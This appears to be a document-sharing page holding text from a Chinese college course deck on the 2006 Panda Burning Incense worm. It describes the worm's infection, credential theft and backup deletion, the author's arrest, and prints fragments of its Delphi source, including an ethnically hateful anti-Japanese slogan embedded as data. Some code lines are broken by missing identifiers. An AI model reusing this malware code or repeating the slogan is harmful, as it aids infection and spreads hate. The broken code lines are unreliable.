熊猫烧香病毒剖析.ppt

该【熊猫烧香病毒剖析 】是由【3827483】上传分享，文档一共【39】页，该文档可以免费在线阅读，需要了解更多关于【熊猫烧香病毒剖析 】的内容，可以使用淘豆网的站内搜索功能，选择自己适合的文档，以下文字是截取该文章内的部分文字，如需要获得完整电子版，请下载此文档到您的设备，方便您编辑和打印。计算机病毒与防治课程小组
计算机病毒与防治
重庆电子工程职业学院
汇报时间：12月20日
Annual Work
Summary Report
#2022
教学单元4-4 蠕虫病毒防治
熊猫烧香病毒源码分析
熊猫烧香病毒特点
熊猫烧香病毒行为分析
第二讲 熊猫烧香蠕虫病毒剖析
计算机病毒与防治课程小组
熊猫烧香病毒的手工清除
计算机病毒与防治课程小组
病毒类型 蠕虫病毒
危险级别 ★★★★★
影响系统 Win 9X/ME/NT/2000/XP/2003
病毒名称 熊猫烧香
又称 尼姆亚、武汉男生、.、.
熊猫烧香病毒特点
计算机病毒与防治课程小组
2006年底，我国互联网上大规模爆发“熊猫烧香”病毒及其变种，该病毒通过多种方式进行传播，同时该病毒还具有盗取用户游戏账号、ＱＱ账号等功能。该病毒传播速度快，危害范围广，截至案发为止，已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏，引起社会各界高度关注。
《瑞星2006安全报告》将其列为十大病毒之首，在《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。
熊猫烧香病毒特点
熊猫烧香病毒特点
计算机病毒与防治课程小组
熊猫烧香一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。
。
1
2
3
熊猫烧香病毒特点
计算机病毒与防治课程小组
湖北省公安厅2007年2月12日宣布，根据统一部署，湖北省网监在多个省市公安机关的配合下，一举侦破了制作传播“熊猫烧香”病毒案，抓获李俊（男，２５岁，武汉新洲区人）。
病毒制造者
计算机病毒与防治课程小组
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接网站下载ddos程序进行发动恶意攻击。
病毒结构
主程序流程图
熊猫烧香病毒源码分析
熊猫烧香病毒源码分析
计算机病毒与防治课程小组
Program  japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432;             //病毒体的大小
iconoffset = $12eb8;           //pe文件主图标的偏移量
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize = 38912;             //upx压缩过病毒体的大小
iconoffset = $92bc;             //upx压缩过pe文件主图标的偏移量
}
iconsize   = $2e8;             //pe文件主图标的大小--744字节
icontail   = iconoffset + iconsize; //pe文件主图标的尾部
id       = $44444444;         //感染标记
病毒文件初始信息
熊猫烧香病毒源码分析
计算机病毒与防治课程小组
catchword = 'if a race need to be killed out, it must be yamato. ' +
if a country need to be destroyed, it must be japan! ' +
***  ***';
//垃圾码，以备写入
function registerserviceprocess(dwprocessid, dwtype: integer): integer; 
stdcall; external '';  //函数声明
{$r *.res}
tmpfile: string;
si:     startupinfo;
pi:     process_information;
isjap:   boolean = false;  //日文操作系统标记
var
熊猫烧香病毒源码分析
计算机病毒与防治课程小组
{ =====判断是否为win9x =====}
function iswin9x: boolean;
var
ver: tosversioninfo;
begin
result := false;
 := sizeof(tosversioninfo);
if not getversionex(ver) then
 exit;
if ( = ver_platform_win32_windows) then //win9x
  result := true;
end;